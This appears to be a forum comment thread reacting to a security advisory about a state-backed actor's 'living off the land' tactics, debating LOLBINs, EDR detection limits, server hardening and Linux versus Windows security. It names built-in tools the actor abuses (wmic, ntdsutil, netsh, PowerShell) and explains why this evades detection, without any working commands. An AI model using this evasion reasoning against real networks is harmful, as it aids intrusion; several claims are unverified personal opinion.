On Linux servers I always uninstall the compiler and dev tools. I actually wrote a little script to dry-run uninstall every single package on the server one by one, and if uninstalling it doesn't remove anything important I'll go ahead an uninstall it.
I'm left with only a bare minimum of stuff, even things like man pages or simple utils I'll uninstall.
if you're uploading a compiler you could just upload a binary. unless it's a very specific system you can probably just put it together "at home" and slap it in there.
summary pgh 3 [One of the actor’s primary tactics, techniques, and procedures (TTPs) is living off the
land, which uses built-in network administration tools to perform their objectives. This
TTP allows the actor to evade detection by blending in with normal Windows system
and network activities, avoid endpoint detection and response (EDR) products that
would alert on the introduction of third-party applications to the host, and limit the
amount of activity that is captured in default logging configurations. Some of the built-in
tools this actor uses are: wmic , ntdsutil , netsh , and PowerShell .]
Oh wow, so living off the land is the same as "hands-on-keyboard" activity now? They used impacket ffs! This is a very typical post-compromise playbook many actors use. A lot of this might even be considered bad opsec.
This is why it is said that APTs are usually not very sophisticated, they just have a lot of resources.
Are LOLBINs still an issue for most companies? I was under the impression that most endpoint detection products simply trace all syscalls, and therefore can somewhat accurately extract information about exploitation events without relying on a "foreign" file artifact.
LOLBINs are very much an issue at pretty much every company there is, just because there's a way to detect them doesn't mean they're actually detected, or that an alert is made, or that the alert is triaged correctly, or that EDR is even turned on, etc
it's a needle in the haystack issue. plus most EDR products do not actually alert on benign looking syscalls as it'll quickly cause an false positive overload
I would be very surprised if EDR products didn't use some form of anomaly detection (e.g. autoencoders[1], ANN embeddings etc.)
I've gotten into trouble with employers over editing system configuration files and trying to start reverse shells, and I can't imagine execve() or connect()+dup2() are malicious either.
Some are working on it (SentinelOne is a notable player with the capacity), but ML domain experience in the Cybersecurity space is severely lacking as a lot of Cybersecurity PMs and Founders are ex-Networking types who view ML/AI as marketing hype.
Source: am a PM in the space who has been banging heads with these types of people
They might and some definitely do, but at large enough scale maintaining a good anomaly detection signal to noise ratio becomes very difficult.
A single ubuntu terminal spawn will generate something like 20 system calls. Now multiply that with however many actions you take during 8 hours of using a computer with your generic corp of over 10k hosts.
Depends. The TS/SCI enclave at Raytheon R&D is probably locked down. However, most of the (sub)contracting work is done by small-medium business America and they've never even heard of lolbins.
This is not about CCP spies setting up a tent in the wilderness and using public wifi to launch hacks, this is about "living off the land" meaning using existing system admin tools to hack systems. Although the other explanation would be more cyberpunk.
I believe even an expert security researcher would have a hard time using windows as a personal machine without getting hacked. There are so many attack vectors and the security updates+guidance from Microsoft is completely lacking.
Most serious security researchers use an airgapped laptop with a wireless card pulled or otherwise disabled. There's far fewer ways to compromise a laptop where the only comms are on a USB stick physically transported between two computers, though it's not necessarily impossible.
There are mentions of Linux right at the beginning:
>The actor has leveraged compromised small office/home office (SOHO) network
devices as intermediate infrastructure to obscure their activity by having much of the command and control (C2) traffic emanate from local ISPs in the geographic area of the victim.
If you're just running a random linux server that isn't an otherwise "interesting" target the only times I've seen those get compromised is by some ludicrously dumb configuration mistakes, such as running databases with a default admin password and no firewall, etc.
It's a less interesting target for a lot of widespread attacks. Consider the surface area of Linux machines vs Windows? Most big corporations run on windows, even if devs rock Linux, that's not usually what these types of attacks are after.
That said you are right. Most Linux users ride on insecure machines. I remember talking to someone who had no idea they had to set up a firewall. They had switched from Linux 2 years prior under the guise that it was more secure than windows out of the box. I wish Linux security was talked about more. The people who know how to do it assume everyone does, and the people who don't... don't know what they don't know.